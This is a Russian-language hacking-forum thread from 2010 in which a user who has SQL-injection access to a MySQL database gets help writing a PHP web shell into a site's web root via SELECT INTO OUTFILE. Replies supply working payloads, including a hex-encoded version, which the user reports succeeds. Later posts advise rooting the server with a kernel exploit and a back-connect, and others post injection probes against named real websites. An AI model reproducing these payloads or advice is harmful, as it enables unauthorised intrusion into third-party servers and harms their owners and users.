ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.06.2010, 10:11
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Сообщение от stasiliy
Помогите плз.
Узнал через пхп инъекц. доступ от МУСКУл.
Создаю в файле запрос
select '<?php passthru($_GET['cmd'])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
Пишет ошибку,так как у нас $_GET['cmd']
Подскажите как обойти эти кавычки =)
во-первых можно захексить -
Код:
select 0x3C3F70687020706173737468727528245F4745545B27636D64275D293F3E into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
во-вторых можно без кавычек
Код:
select '<?php passthru($_GET[cmd])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
в-третьих - юзай eval
|
|
|
03.06.2010, 10:22
|
|
Новичок
Регистрация: 26.09.2009
Сообщений: 22
Провел на форуме:
44954
Репутация:
0
|
|
вот создал запрос select '<? eval($_GET[cmd]);?>' into outfile блабла
файл создался, пишет ошибку
Parse error: syntax error, unexpected ')' in /usr/home/yana2/www/site10/public_html/lnd2.php on line 1
я чето не вижу в синтаксисе ошибку((
|
|
|
|
03.06.2010, 10:26
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от stasiliy
вот создал запрос select '<? eval($_GET[cmd]);?>' into outfile блабла
файл создался, пишет ошибку
Parse error: syntax error, unexpected ')' in /usr/home/yana2/www/site10/public_html/lnd2.php on line 1
я чето не вижу в синтаксисе ошибку((
ты прямо подставляй запрос cmd=phpinfo();
|
|
|
|
03.06.2010, 10:54
|
|
Новичок
Регистрация: 26.09.2009
Сообщений: 22
Провел на форуме:
44954
Репутация:
0
|
|
Я ведь делаю запрос со своего сервера, с файла
$query ="select '<? echo eval($_GET['cmd']);?>' into outfile '/usr/home/yana2/www/site10/public_html/lnd10.php'";
$res = mysql_query($query);
ошибка syntax error
Если пишу eval($_GET[cmd]); <- без кавычек
то оштбка:yntax error, unexpected ')'
Помогите, может както кодировку понятную мускул зделать?
|
|
|
|
03.06.2010, 10:57
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от stasiliy
Я ведь делаю запрос со своего сервера, с файла
$query ="select '<? echo eval($_GET['cmd']);?>' into outfile '/usr/home/yana2/www/site10/public_html/lnd10.php'";
$res = mysql_query($query);
ошибка syntax error
Если пишу eval($_GET[cmd]); <- без кавычек
то оштбка:yntax error, unexpected ')'
Помогите, может както кодировку понятную мускул зделать?
Хекси.
|
|
|
|
03.06.2010, 11:09
|
|
Новичок
Регистрация: 26.09.2009
Сообщений: 22
Провел на форуме:
44954
Репутация:
0
|
|
О )) спс)) все работает)
И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?
Последний раз редактировалось stasiliy; 03.06.2010 в 11:15..
|
|
|
|
03.06.2010, 11:34
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
привет команде;
Можно ли придать этим сайтом? потому что я пытался, но никакого результата
http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''36''' at line 1
http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%20order%20by%201000-- <-true
 |
|
|
|
03.06.2010, 11:35
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от stasiliy
О )) спс)) все работает)
И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?
Да, рутай сервер.
Ищи сплоит под версию ядра (uname -a), делай бэкконект и пробуй запустить плоент.
Если год версии ядра 2010, то врят ли порутаешь.
|
|
|
|
03.06.2010, 11:59
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от stasiliy
О )) спс)) все работает)
И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?
Редко, если только пользователь, от которого запускается web-сервер, является владельцем или входит в группу владельцев папки, к которой необходимо поменять доступ.
|
|
|
|
03.06.2010, 12:21
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Здесь есть SQL-inj?
http://www.bigr.nl/website/structure/main.php?page=people&subpage=person&id=51'+order+b y+1000+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
